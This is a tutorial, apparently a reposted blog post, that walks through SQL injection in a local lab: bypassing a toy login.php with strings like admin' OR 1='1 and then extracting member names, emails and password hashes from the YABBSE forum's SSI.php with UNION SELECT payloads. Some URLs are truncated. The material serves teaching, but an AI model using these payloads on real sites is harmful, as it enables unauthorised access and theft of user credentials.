SQL Injection Attacks Tutorial

I. Manipulating login.php Script
[01] Open the terminal and type (without prepending prompt symbols):

$ su -
# sql_tutorial_start

These commands will start all needed services in the background.

[02] Open the browser and check http://localhost/phpmyadmin/.

Have a look at the databse userdb that our login.php script is accessing

[04] Have a look at login.php script. To do this, open another terminal and type:

$ vi login.php

or, in case you are not familiar with vi text editor, you can use more user friendly mcedit (or any other editor you wish):

$ mcedit login.php

[05] If you want to see the submitted query to get more information, delete prepending slashes in echo "$query
" line:

[06] Now open the browser again and go to http://localhost/login.php. You will see a page similar to the one below:

[07] Enter username admin which we know is existing. As you can see, we cannot login due to the missing password.

[08] Now append a ' to the username to see if the script is vulnerable. The script generates an error, so we can move on.

[09] Enter admin' OR 1=1 as username and see what happens.

[10] Out of the query we can see that we have a closing single quote that isn't opened.

[11] Enter admin 'OR 1='1 as username. Now the query is valid and we're in:

[12] To advance the attack you might whant to check out the /* to comment out all the following. Enter admin' /*" as username then and check the query:

SELECT * FROM `userlist` WHERE `username` = 'admin' /*' AND `password` = ''

is what we entered, but only the part before /* is proccessed by the database. This is why the statement is valid.


[01] We installed YABBSE under http://localhost/yabbse/. The vulnerable script is located at http://localhost/yabbse/SSI.php.

Open the script in the console by typing:

$ vi /yabbse/SSI.php

or use whichever editor you want. Now move to the line 222, where the query we are trying to manipulate is located.

[03] To get into the function recentTopics, call http://localhost/yabbse/SSI.php?func...r /> [04] In this query a variable $ID_MEMBER is processed. This is where we try to break in. We should now move to http://localhost/yabbse/SSI.php?func..._MEMBER=1' (notice the single quote at the end). This results in an error, so the script is potentially vulnerable to SQL Injection attack.

[05] Out of the error message we can see that a table lmr is referenced in the original query that is now missing. We search for the original query in the editor and append the missing part to our query.

[06] Go to http://localhost/yabbse/SSI.php?func...ics&ID_MEMBER= 1) LEFT JOIN yabbse_log_mark_read AS lmr ON (lmr.ID_BOARD=t.ID_BOARD AND lmr.ID_MEMBER=1) UNION SELECT ID_MEMBER, memberName FROM yabbse_members /*. Out of the error message, we can see that the inserted SELECT statement doesn't have the equal number of queries. We have to add something to make it equal then.

[07] Move your browser to http://localhost/yabbse/SSI.php?func...ics&ID_MEMBER= 1 OR 1=1) LEFT JOIN yabbse_log_mark_read AS lmr ON (lmr.ID_BOARD=t.ID_BOARD AND lmr.ID_MEMBER=1 OR 1=1) UNION SELECT memberName, emailAddress, passwd, null, null, null, null, null, null, null, null, null FROM yabbse_members /*. Now we seem to have a valid query, but can only see the e-mail address:

[08] Have a look at line 223 and below. There is a HTML parser to be found that shows the result of our query. So what we have to do now is to mix around our null statements.

[09] Move to http://localhost/yabbse/SSI.php?func...s&ID_MEMBER=1) LEFT JOIN yabbse_log_mark_read AS lmr ON (lmr.ID_BOARD=t.ID_BOARD AND lmr.ID_MEMBER=1 OR 1=1) UNION SELECT null, memberName, null, emailAddress, null, passwd,null,null,null,null,null,null FROM yabbse_members /*. There we are - we have managed to obtain all information we wanted:

[10] Return to a terminal opened at the beginning (or open a new one) and issue commands:

$ su -
# sql_tutorial_stop

This will stop all services needed to pass through this tutorial.

Niciun comentariu: